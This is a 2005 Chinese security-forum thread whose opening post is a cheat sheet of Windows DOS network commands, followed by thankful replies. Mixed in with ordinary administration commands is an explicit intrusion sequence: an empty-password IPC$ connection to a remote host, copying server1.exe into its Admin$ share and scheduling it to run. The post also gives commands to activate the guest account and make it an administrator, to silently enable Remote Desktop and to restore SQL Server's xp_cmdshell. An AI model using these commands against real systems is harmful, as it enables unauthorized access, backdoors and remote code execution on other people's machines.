|
![]() | 作者: toby57 [toby57]
![]() |
登录 |
====================================================== 一些常用的DOS网络命令 ====================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要*这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 -------------------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 ------------------------------------------------------- 3389 DOS开启 ------------------------------------------------------- echo [Components] > c:\sql echo TSEnable = on >> c:\sql sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q --------- C:\>dir c:\sysoc.inf /s 检查INF文件的位置 C:\> dir c:\sysocmgr.* /s 检查组件安装程序 ------------------------------------------------------- query user 查看正在使用的用户 logoff user 踢掉正在使用帐号的ID(这里的ID不是你的帐号) ------------------------------------------------------- 删除Radmin服务 r_server.exe /stop r_server /uninstall /silence ------------------------------------------------------- 开启cmdshell的SQL语句 EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 判断存储扩展是否存在 Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' 返回结果为1就OK 恢复xp_cmdshell Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' 返回结果为1就OK 否则上传xplog7.0.dll Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll' 堵上cmdshell的SQL语句 sp_dropextendedproc "xp_cmdshell" Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' ![]() |
地主 发表时间: 05-03-26 10:30 |
![]() | 回复: wormer [wormer] ![]() |
登录 |
不错不错```````````` 有点价值```````````````` 支持````````````````````````` |
B1层 发表时间: 05-03-26 18:21 |
![]() | 回复: virgoshaka [virgoshaka] ![]() |
登录 |
如果是你自己写的就好了呵呵 |
B2层 发表时间: 05-03-26 22:28 |
![]() | 回复: glxlbls [glxlbls] ![]() |
登录 |
好东西谢了 |
B3层 发表时间: 05-03-27 10:32 |
![]() | 回复: shuke [shuke] ![]() |
登录 |
好东西,谢谢楼主 |
B4层 发表时间: 05-03-27 16:24 |
![]() | 回复: xta54288 [xta54288] ![]() |
登录 |
我有遇到这样的问题,是对方的at命令没有开,我们怎么样才能帮他开??? |
B5层 发表时间: 05-04-02 12:23 |
![]() | 回复: langren421 [langren421] ![]() |
登录 |
谢谢啊 不错啊 |
B6层 发表时间: 05-04-02 17:05 |
![]() | 回复: nebulae [nebulae] ![]() |
登录 |
谢了![]() |
B7层 发表时间: 05-04-02 19:46 |
![]() | 回复: attrib [attrib] ![]() |
登录 |
不错,对俺们菜鸟来讲是好东东。 |
B8层 发表时间: 05-04-02 19:56 |
![]() | 回复: xuruijun [xuruijun] ![]() |
登录 |
很不错,值得顶!!!!!!!!!!!!!!!!!!! |
B9层 发表时间: 05-04-02 21:41 |
![]() | 回复: gueiji [gueiji] ![]() |
登录 |
建议大家到系统的帮助中学习命令 |
B10层 发表时间: 05-04-02 22:09 |
![]() | 回复: feng217 [feng217] ![]() |
登录 |
不错呀!有价值!支持! |
B11层 发表时间: 05-04-03 21:13 |
![]() | 回复: huzo [huzo] ![]() |
登录 |
谢谢了![]() ![]() ![]() |
B12层 发表时间: 05-04-15 19:26 |
![]() | 回复: amwsssqtd [amwsssqtd] ![]() |
登录 |
对我很有用,谢了! |
B13层 发表时间: 05-04-16 16:23 |
![]() | 回复: xym1210 [xym1210] ![]() |
登录 |
什么时候DOS才能派上用场呀 |
B14层 发表时间: 05-04-16 16:50 |
![]() | 回复: zzw4941811 [zzw4941811] ![]() |
登录 |
支持支持!!!!!!!!!!!!!!!!!!!!! |
B15层 发表时间: 05-04-17 01:24 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号